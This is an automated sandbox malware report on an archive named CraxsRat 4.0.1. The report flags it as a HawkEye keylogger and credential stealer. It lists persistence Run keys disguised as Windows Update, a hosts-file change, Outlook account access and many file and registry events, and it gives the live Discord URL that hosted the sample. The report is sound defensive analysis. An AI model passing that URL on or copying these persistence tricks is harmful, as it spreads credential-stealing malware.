Malware Analysis Report

2024-09-22 11:36

Sample ID 230621-ampkqseh24
Target https://cdn.discordapp.com/attachments/1096943623599312947/1120870643668373535/CraxsRat_4.0.1.zip
Tags
hawkeye collection discovery evasion keylogger persistence spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file https://cdn.discordapp.com/attachments/1096943623599312947/1120870643668373535/CraxsRat_4.0.1.zip was found to be: Known bad.

Malicious Activity Summary

hawkeye collection discovery evasion keylogger persistence spyware stealer trojan

Suspicious use of NtCreateUserProcessOtherParentProcess

HawkEye

NirSoft MailPassView

NirSoft WebBrowserPassView

Nirsoft

Blocklisted process makes network request

Stops running service(s)

Drops file in Drivers directory

Downloads MZ/PE file

Uses the VBS compiler for execution

Drops startup file

Checks computer location settings

Executes dropped EXE

Registers COM server for autorun

Modifies system executable filetype association

Loads dropped DLL

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Accesses Microsoft Outlook accounts

Checks installed software on the system

Suspicious use of SetThreadContext

Launches sc.exe

Drops file in Program Files directory

Enumerates physical storage devices

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Enumerates system info in registry

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Modifies data under HKEY_USERS

Modifies registry class

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK Matrix V6

Analysis: static1

Detonation Overview

Reported

2023-06-21 00:19

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-06-21 00:19

Reported

2023-06-21 00:30

Platform

win10v2004-20230220-en

Max time kernel

529s

Max time network

507s

Command Line

C:\Windows\system32\lsass.exe

Signatures

HawkEye

keylogger trojan stealer spyware hawkeye

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\qrjhwnek.reg1.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\CraxsRat_4.0.1\CraxsRat 4.0.1\CraxsRat 4.0.1.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\BLACKK.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\winrar-x64-622.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Modifies system executable filetype association

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32 C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" C:\Program Files\WinRAR\uninstall.exe N/A

Registers COM server for autorun

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA}\InProcServer32\ = "C:\\Program Files\\WinRAR\\rarext.dll" C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA}\InProcServer32\ThreadingModel = "Apartment" C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA}\InProcServer32 C:\Program Files\WinRAR\uninstall.exe N/A

Uses the VBS compiler for execution

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate.exe" C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
Key created \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Software\Microsoft\Windows\CurrentVersion\Run C:\Users\Admin\AppData\Local\Temp\qrjhwnek.reg2.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsHostProcessor = "\"C:\\Users\\Admin\\AppData\\Roaming\\WindowsHostProcessor\\WindowsHostProcessor.exe\" " C:\Users\Admin\AppData\Local\Temp\qrjhwnek.reg2.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A whatismyipaddress.com N/A N/A
N/A whatismyipaddress.com N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\WinRAR\Rar.txt C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\Rar.txt C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\Zip64.SFX C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-32.png C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\7zxa.dll C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\RarExt32.dll C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\RarExtPackage.msix C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\Uninstall.lst C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\RarExt32.dll C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\WinRAR.chm C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\RarFiles.lst C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\Resources.pri C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\zipnew.dat C:\Program Files\WinRAR\uninstall.exe N/A
File created C:\Program Files\WinRAR\__tmp_rar_sfx_access_check_240613437 C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-64.png C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-64.png C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\ReadMe.txt C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\Uninstall.exe C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-48.png C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\WinRAR.exe C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\7zxa.dll C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\WinCon64.SFX C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\Descript.ion C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\WhatsNew.txt C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\Order.htm C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\Rar.exe C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\RarExtInstaller.exe C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\WinRAR.exe C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\Descript.ion C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\Rar.exe C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\RarExtPackage.msix C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\rarnew.dat C:\Program Files\WinRAR\uninstall.exe N/A
File opened for modification C:\Program Files\WinRAR\WhatsNew.txt C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\Uninstall.lst C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\Resources.pri C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\WinCon.SFX C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\Zip.SFX C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\ReadMe.txt C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\License.txt C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\Uninstall.exe C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\Default64.SFX C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\WinCon.SFX C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\Zip.SFX C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-48.png C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\WinRAR.chm C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\RarExtInstaller.exe C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\Order.htm C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\UnRAR.exe C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\RarExt.dll C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\Default.SFX C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\WinCon64.SFX C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-32.png C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\License.txt C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\UnRAR.exe C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\RarExt.dll C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\Default64.SFX C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\Zip64.SFX C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\RarFiles.lst C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\Default.SFX C:\Users\Admin\Downloads\winrar-x64-622.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133317804125845429" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.lzh C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.tbz\ = "WinRAR" C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\ = "WinRAR archive" C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR32 C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.r17\ = "WinRAR" C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.r22\ = "WinRAR" C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\ = "WinRAR ZIP archive" C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.uu\ = "WinRAR" C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.r06\ = "WinRAR" C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.7z C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.7z\ = "WinRAR" C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open\command C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.r00 C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.r16 C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.arj C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.r02 C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.rar\ = "WinRAR" C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.r24 C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA} C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\DropHandler C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ = "WinRAR" C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.r04 C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA}\InProcServer32\ = "C:\\Program Files\\WinRAR\\rarext.dll" C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.zip\ShellNew C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.lha\ = "WinRAR" C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.tar\ = "WinRAR" C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.r07 C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bz C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.r17 C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.r25\ = "WinRAR" C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.zst C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.r04\ = "WinRAR" C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.xxe\ = "WinRAR" C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.txz\ = "WinRAR" C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.r09\ = "WinRAR" C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.rev\ = "WinRAR.REV" C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\ = "RAR recovery volume" C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cab C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.gz C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.001 C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.rar C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\DefaultIcon C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.r19 C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.r12\ = "WinRAR" C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.lz C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.r18 C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.r29\ = "WinRAR" C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.arj\ = "WinRAR" C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.r22 C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.zip\ = "WinRAR.ZIP" C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.r15 C:\Program Files\WinRAR\uninstall.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
